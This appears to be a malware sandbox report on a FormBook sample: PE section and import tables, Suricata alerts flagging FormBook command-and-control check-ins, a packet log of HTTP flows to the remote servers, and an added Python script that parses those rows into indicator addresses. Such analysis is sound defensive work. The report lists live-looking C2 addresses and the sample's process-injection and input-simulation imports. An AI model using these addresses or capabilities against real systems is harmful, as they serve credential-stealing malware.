IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2730          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x860         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8b54f       0x8b600   f437a6545e938612764dbb0a314376fc  False     0.5699499019058296   data       6.680413749210956   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8d000          0x2cc42       0x2ce00   827ffd24759e8e420890ecf164be989e  False     0.330464397632312    data       5.770192333189168   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xba000          0x9d54        0x6200    e0a519f8e3a35fae0d9c2cfd5a4bacfc  False     0.16402264030612246  data       2.002691099965349   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc4000          0x5b434       0x5b600   2a8cf14cf679454656e75fd2473b6f14  False     0.9276141415868673   data       7.894603702155416   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x120000         0xa474        0xa600    0bc98f8631ef0bde830a7f83bb06ff08  False     0.5017884036144579   data       5.245426654116355   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                               Language  Country        ZLIB Complexity
RT_ICON        0xc45a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                     English   Great Britain  0.7466216216216216
RT_ICON        0xc46d0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors  English   Great Britain  0.3277027027027027
RT_ICON        0xc47f8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                     English   Great Britain  0.3885135135135135
RT_ICON        0xc4920   0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0                       English   Great Britain  0.3333333333333333
RT_ICON        0xc4c08   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0                       English   Great Britain  0.5
RT_ICON        0xc4d30   0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0                       English   Great Britain  0.2835820895522388
RT_ICON        0xc5bd8   0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0                       English   Great Britain  0.37906137184115524
RT_ICON        0xc6480   0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0                       English   Great Britain  0.23699421965317918
RT_ICON        0xc69e8   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0                      English   Great Britain  0.13858921161825727
RT_ICON        0xc8f90   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0                      English   Great Britain  0.25070356472795496
RT_ICON        0xca038   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0                      English   Great Britain  0.3173758865248227
RT_MENU        0xca4a0   0x50     data                                                                               English   Great Britain  0.9
RT_STRING      0xca4f0   0x594    data                                                                               English   Great Britain  0.3333333333333333
RT_STRING      0xcaa84   0x68a    data                                                                               English   Great Britain  0.2747909199522103
RT_STRING      0xcb110   0x490    data                                                                               English   Great Britain  0.3715753424657534
RT_STRING      0xcb5a0   0x5fc    data                                                                               English   Great Britain  0.3087467362924282
RT_STRING      0xcbb9c   0x65c    data                                                                               English   Great Britain  0.34336609336609336
RT_STRING      0xcc1f8   0x466    data                                                                               English   Great Britain  0.3605683836589698
RT_STRING      0xcc660   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                   English   Great Britain  0.502906976744186
RT_RCDATA      0xcc7b8   0x52739  data                                                                                                        1.0003286736685015
RT_GROUP_ICON  0x11eef4  0x76     data                                                                               English   Great Britain  0.6610169491525424
RT_GROUP_ICON  0x11ef6c  0x14     data                                                                               English   Great Britain  1.25
RT_GROUP_ICON  0x11ef80  0x14     data                                                                               English   Great Britain  1.15
RT_GROUP_ICON  0x11ef94  0x14     data                                                                               English   Great Britain  1.25
RT_VERSION     0x11efa8  0xdc     data                                                                               English   Great Britain  0.6181818181818182
RT_MANIFEST    0x11f084  0x3b0    ASCII text, with CRLF line terminators                                             English   Great Britain  0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T18:11:47.039456+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
2024-11-25T18:12:21.188999+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 116.50.37.244 | 80 | TCP
2024-11-25T18:13:44.783297+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49811 | 85.159.66.93 | 80 | TCP
2024-11-25T18:13:59.633445+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49957 | 91.195.240.94 | 80 | TCP
2024-11-25T18:14:23.456951+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50013 | 66.29.149.46 | 80 | TCP
2024-11-25T18:14:43.704610+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50022 | 195.110.124.133 | 80 | TCP
2024-11-25T18:15:15.646956+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | TCP
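The alert rows above and the packet rows that follow are HTML table cells flattened into one string, so severity, address and port digits run together (the last octet of the remote address and the remote port are the worst case: "154.215.72.11080" reads as 154.215.72.110:80 or as 154.215.72.1:1080). The Python below is an added example, not Joe Sandbox tooling or output: it recovers the fields by enumerating every reading that satisfies the IPv4 and port rules, keeps only readings in which the analysis host talks from a client port, and settles what is left against the flows seen in the packet table. It assumes the analysis host is 192.168.2.4 (the address in every row on this page) and that its client ports fall in the Windows dynamic range 49152-65535; the sample rows are copied verbatim from the two tables on this page.

```python
"""Recover structured fields from Joe Sandbox alert and packet rows whose table
cells were flattened into one string.  Added example, not part of the report."""
import re

LOCAL_IP = "192.168.2.4"   # assumption: the analysis VM, present in every row on this page
EPHEMERAL_MIN = 49152      # assumption: Windows default dynamic client-port range

# Rows copied from the Suricata alert table and the TCP packet table on this page.
ALERT_ROWS = [
    "2024-11-25T18:11:47.039456+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736154.215.72.11080TCP",
    "2024-11-25T18:12:21.188999+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449757116.50.37.24480TCP",
    "2024-11-25T18:13:44.783297+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44981185.159.66.9380TCP",
    "2024-11-25T18:13:59.633445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44995791.195.240.9480TCP",
    "2024-11-25T18:14:23.456951+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001366.29.149.4680TCP",
    "2024-11-25T18:14:43.704610+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450022195.110.124.13380TCP",
    "2024-11-25T18:15:15.646956+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450026217.196.55.20280TCP",
]
PACKET_ROWS = [  # first packet of four alerted flows, plus one server-to-client packet
    "Nov 25, 2024 18:11:45.334497929 CET4973680192.168.2.4154.215.72.110",
    "Nov 25, 2024 18:11:45.456644058 CET8049736154.215.72.110192.168.2.4",
    "Nov 25, 2024 18:12:19.480281115 CET4975780192.168.2.4116.50.37.244",
    "Nov 25, 2024 18:12:43.230247021 CET4981180192.168.2.485.159.66.93",
    "Nov 25, 2024 18:13:58.105535984 CET4995780192.168.2.491.195.240.94",
]

def _octet_ok(o):
    return o.isdigit() and (o == "0" or o[0] != "0") and int(o) <= 255

def is_ip(tok):
    parts = tok.split(".")
    return len(parts) == 4 and all(_octet_ok(p) for p in parts)

def is_port(tok):
    return tok.isdigit() and tok[0] != "0" and int(tok) <= 65535

def splits(s, kinds):
    """Every way to read s as the concatenation of the given field kinds ('ip' / 'port')."""
    if not kinds:
        return [()] if s == "" else []
    check = is_ip if kinds[0] == "ip" else is_port
    out = []
    for i in range(1, min(len(s), 15) + 1):   # an IPv4 literal is at most 15 characters
        if check(s[:i]):
            out.extend((s[:i],) + rest for rest in splits(s[i:], kinds[1:]))
    return out

def _flow(src_ip, src_port, dst_ip, dst_port):
    """(local_port, remote_ip, remote_port) when one side is the local host on a client port."""
    src_port, dst_port = int(src_port), int(dst_port)
    if src_ip == LOCAL_IP and src_port >= EPHEMERAL_MIN:
        return (src_port, dst_ip, dst_port)
    if dst_ip == LOCAL_IP and dst_port >= EPHEMERAL_MIN:
        return (dst_port, src_ip, src_port)
    return None

PACKET_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<fields>[\d.]+)$")
ALERT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})(?P<sid>\d+)"
    r"(?P<sig>\D.*?)(?P<sev>\d)(?P<fields>\d{1,3}\.[\d.]+)(?P<proto>TCP|UDP)$")

def parse_packet(row):
    """Packet rows hold 'srcport dstport srcip dstip'; the constraints leave one reading."""
    m = PACKET_RE.match(row)
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    flows = set()
    for sp, dp, sip, dip in splits(m["fields"], ("port", "port", "ip", "ip")):
        f = _flow(sip, sp, dip, dp)
        if f:
            flows.add(f)
    if len(flows) != 1:
        raise ValueError(f"{len(flows)} readings for packet row {row!r}")
    return {"ts": m["ts"], "flow": flows.pop()}

def parse_alert(row, known_flows=()):
    """Alert rows hold 'srcip srcport dstip dstport'.  Flows from the packet table
    settle an ambiguous remote address/port; otherwise all candidates are kept."""
    m = ALERT_RE.match(row)
    if not m:
        raise ValueError(f"not an alert row: {row!r}")
    flows = set()
    for sip, sp, dip, dp in splits(m["fields"], ("ip", "port", "ip", "port")):
        f = _flow(sip, sp, dip, dp)
        if f:
            flows.add(f)
    narrowed = flows & set(known_flows)
    if len(flows) > 1 and len(narrowed) == 1:
        flows = narrowed
    return {"ts": m["ts"], "sid": int(m["sid"]), "signature": m["sig"].strip(),
            "severity": int(m["sev"]), "proto": m["proto"], "candidates": sorted(flows),
            "flow": next(iter(flows)) if len(flows) == 1 else None}

def c2_iocs(alert_rows, packet_rows):
    """Unique remote ip:port pairs from the alerts; alerts that still admit several
    readings are returned separately rather than guessed."""
    known = {parse_packet(r)["flow"] for r in packet_rows}
    alerts = [parse_alert(r, known) for r in alert_rows]
    resolved = sorted({(a["flow"][1], a["flow"][2]) for a in alerts if a["flow"]})
    unresolved = [a for a in alerts if not a["flow"]]
    return resolved, unresolved

if __name__ == "__main__":
    iocs, open_alerts = c2_iocs(ALERT_ROWS, PACKET_ROWS)
    for ip, port in iocs:
        print(f"C2 {ip}:{port}")
    for a in open_alerts:
        print("ambiguous:", a["ts"], [f"{ip}:{port}" for _, ip, port in a["candidates"]])
```

The packet rows resolve on their own because the client-port rule kills every alternative split, and they in turn fix the first four alerts. The last three alerts (remote 66.29.149.46, 195.110.124.133 and 217.196.55.202) have no packet row in this excerpt and keep two or three readings each, all differing only in where the last octet ends and the port begins. Reading them as port 80 is the sensible human call (the signature is an HTTP GET check-in, and every flow the packet table does cover goes to port 80), but the parser refuses to guess; when the IOCs matter, take them from the report's structured export rather than from a flattened text copy.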
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 18:11:45.334497929 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 25, 2024 18:11:45.456644058 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 25, 2024 18:11:45.456826925 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 25, 2024 18:11:45.475092888 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 25, 2024 18:11:45.601325989 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 25, 2024 18:11:47.039231062 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 25, 2024 18:11:47.039338112 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 25, 2024 18:11:47.039455891 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 25, 2024 18:11:47.042996883 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 25, 2024 18:11:47.163583994 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 25, 2024 18:12:11.384831905 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:11.507879019 CET | 80 | 49737 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:11.508125067 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:11.509748936 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:11.630062103 CET | 80 | 49737 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:13.023228884 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:13.098665953 CET | 80 | 49737 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:13.098747015 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:13.099011898 CET | 80 | 49737 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:13.099067926 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:13.150672913 CET | 80 | 49737 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:13.150782108 CET | 49737 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:14.041429996 CET | 49740 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:14.161865950 CET | 80 | 49740 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:14.161945105 CET | 49740 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:14.163758039 CET | 49740 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:14.294800997 CET | 80 | 49740 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:15.679388046 CET | 49740 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:15.800828934 CET | 80 | 49740 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:15.800898075 CET | 49740 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:16.698426008 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:16.948223114 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:16.952250004 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:16.954519033 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:17.074995995 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.075138092 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.075149059 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.075161934 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.075171947 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.097595930 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.097783089 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.151922941 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:17.168643951 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:18.460704088 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:18.516350985 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:18.516396046 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:18.516485929 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:18.516485929 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:18.586672068 CET | 80 | 49748 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:18.586925983 CET | 49748 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:19.480281115 CET | 49757 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:19.606362104 CET | 80 | 49757 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:19.607625961 CET | 49757 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:19.609487057 CET | 49757 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:19.735285997 CET | 80 | 49757 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:21.188296080 CET | 80 | 49757 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:21.188900948 CET | 80 | 49757 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:21.188998938 CET | 49757 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:21.190941095 CET | 49757 | 80 | 192.168.2.4 | 116.50.37.244
Nov 25, 2024 18:12:21.315356016 CET | 80 | 49757 | 116.50.37.244 | 192.168.2.4
Nov 25, 2024 18:12:35.265610933 CET | 49791 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:35.387031078 CET | 80 | 49791 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:35.387162924 CET | 49791 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:35.389682055 CET | 49791 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:35.510571957 CET | 80 | 49791 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:36.898283958 CET | 49791 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:37.019103050 CET | 80 | 49791 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:37.022361994 CET | 49791 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:37.923394918 CET | 49798 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:38.044192076 CET | 80 | 49798 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:38.044286966 CET | 49798 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:38.046266079 CET | 49798 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:38.167867899 CET | 80 | 49798 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:39.554526091 CET | 49798 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:39.679363012 CET | 80 | 49798 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:39.682451010 CET | 49798 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:40.573811054 CET | 49805 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:40.694951057 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
